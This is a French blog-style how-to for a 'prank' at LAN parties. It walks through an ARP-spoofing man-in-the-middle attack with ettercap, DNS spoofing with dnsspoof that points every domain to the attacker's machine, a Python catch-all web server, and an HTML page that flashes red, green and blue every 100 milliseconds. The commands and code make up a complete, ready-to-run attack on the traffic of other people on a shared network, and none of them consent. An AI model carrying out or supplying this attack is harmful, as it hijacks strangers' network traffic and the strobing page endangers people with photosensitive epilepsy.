Plop à tous … dans le genre : « Hacking for fun and fun »
Il peut arriver que l’on s’ennuie lors de participations à des « lan party », rencontres du libre (quoique) et que l’on veuille amuser la galerie, sans trop se faire remarquer.
Le but ici est de faire un man in the middle, pour rediriger toutes les requêtes http sur notre serveur HTTP avec une page étonnamment belle.
Les outils nécessaire :
- des accès http autorisés sur le réseau (sinon, personne ne tombera dans le « piège »).
- ettercap (paquet ettercap) ou arpspoof (paquet dsniff) pour le man in the middle
- dnsspoof (paquet dsniff) pour le dns spoofing
- un serveur http en place (voir le serveur http python en 1 ligne de commande dans l’article précédent)
la Manipulation :
- On met en place le forwarding
- On créer un fichier qui renverra vers notre ip tout les domaines.
- On met en marche notre spoofing dns sur notre interface réseau
- On met en place notre serveur HTTP (cf script plus bas)
- On met en place le man in the middle
-
sudo sysctl net.ipv4.ip_forward=1
-
echo "VOTRE_IP *" > hostfile
-
sudo dnsspoof -i INTERFACE_RESEAU -f hostfile &
-
sudo ./webserver.py &
-
ettercap -Tqi INTERFACE_RESEAU -M arp:remote // //
Et tout le monde sur le réseau se retrouvera sur votre serveur HTTP à afficher notre belle page html …
Pour le serveur HTTP on peut utiliser le script suivant :
C’est un serveur un peu spécial, puisque pour n’importe quelle requête http reçu (et pour n’importe quelle page), il renvoit l’index.html courant
-
#!/usr/bin/python
-
from os import curdir, sep
-
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-
-
class MyHTTPServer(BaseHTTPRequestHandler):
-
def do_GET(self):
-
try:
-
f = open(curdir + sep + "index.html")
-
self.send_response(200)
-
self.send_header('Content-type','text/html')
-
self.end_headers()
-
self.wfile.write(f.read())
-
f.close()
-
return
-
except IOError:
-
self.send_error(404,'File Not Found: %s' % self.path)
-
def do_POST(self):
-
do_GET(self)
-
-
def main():
-
try:
-
server = HTTPServer(('', 80), MyHTTPServer)
-
print 'On demarre le serveur WEB…'
-
server.serve_forever()
-
except KeyboardInterrupt:
-
print 'On eteint …'
-
server.socket.close()
-
-
if __name__ == '__main__':
-
main()
une idée d’index.html à afficher (j’en suis trop fière quand même ^^ ) :
-
<html>
-
<head>
-
<title>Les kikoolols attaquent !!</title>
-
</head>
-
<body>
-
<div style="width:300px;text-align:center;margin:0 auto;margin-top:25%"><h2>Un exemple de script qui éclate bien les yeux, un régale pour du spoofing en lan party, …</h2></div>
-
<script type="text/javascript">
-
var i=0;
-
function lol()
-
{
-
var color ="";
-
switch(i%3)
-
{
-
case 0:color="red";break;
-
case 1:color="green";break;
-
default:color="blue";
-
}
-
i++;
-
document.bgColor=color;
-
setTimeout("lol()", 100);
-
}
-
setTimeout("lol()", 100);
-
</script>
-
</body>
-
</html>
Et voilà … vous êtes paré pour quelques fou rires en lan …mais il ne faut pas trop en abuser 
ça devient vite lassant :s.
Attention aux epileptiques !!!